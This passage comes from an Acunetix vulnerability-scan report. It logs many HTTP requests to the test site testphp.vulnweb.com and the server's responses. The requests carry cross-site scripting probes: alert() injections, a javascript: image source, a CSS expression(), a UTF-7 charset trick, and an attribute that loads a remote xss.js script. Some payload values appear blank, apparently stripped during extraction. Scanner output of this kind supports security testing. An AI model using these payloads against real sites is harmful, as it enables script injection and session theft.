Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=alert(541705967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

75

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

76

/hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Acunetix Website Audit

77

Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28541915967426%29%3B%22%3E&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

78

/hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=%3C/xss/*-*/style=xss:e/**/xpression(alert(542365967576))%3E&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p="+src="http://testphp.acunetix.com/xss.js?542125967501"> &pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

79

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=
alert(542145967501)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=%00'">alert(542165967501)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Acunetix Website Audit

80

Request GET /hpp/params.php?p=%00"'>alert(542175967501)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=>'>alert(541685967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=alert(541715967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Acunetix Website Audit

81

Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=-->alert(541725967314)%3B&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=email@somealert(541735967314)%3Bdomain.com&p p=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix Website Audit

82

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=&pp=12 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request Acunetix Website Audit

83

GET /hpp/params.php?p=valid&pp=%3C/xss/*-*/style=xss:e/**/xpression(alert(542255967538))%3E HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp=%3CHEAD%3E%3CMETA%20HTTP-EQUIV%3D%22CONTENT-TYPE%22%20CONTENT %3D%22text%2Fhtml%3Bcharset%3DUTF-7%22%3E%3C%2FHEAD%3E%2BADw-ScRiPt%2BAD4-alert%28542045 967461%29%2BADsAPA-%2FScRiPt%2BAD4- HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=%00'">alert(542055967461)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

84

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=%00"'>alert(542065967461)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=
alert(542035967461)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp="+src="http://testphp.acunetix.com/xss.js?54201 5967461"> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

86

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=-->alert(541615967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=alert(541595967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28541645967314%2 9%3B%22%3E HTTP/1.0 Acunetix Website Audit

87

Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=>">alert(541585967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=alert(541605967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close Acunetix Website Audit

88

/hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp=email@somealert(541625967314)%3Bdom ain.com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=alert(541565967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

89

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=>'>alert(541575967314)%3B HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

90

/hpp/params.php Details

Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp=< /ScRiPt> HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /hpp/params.php Details Request GET /hpp/params.php?p=valid&pp= HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; 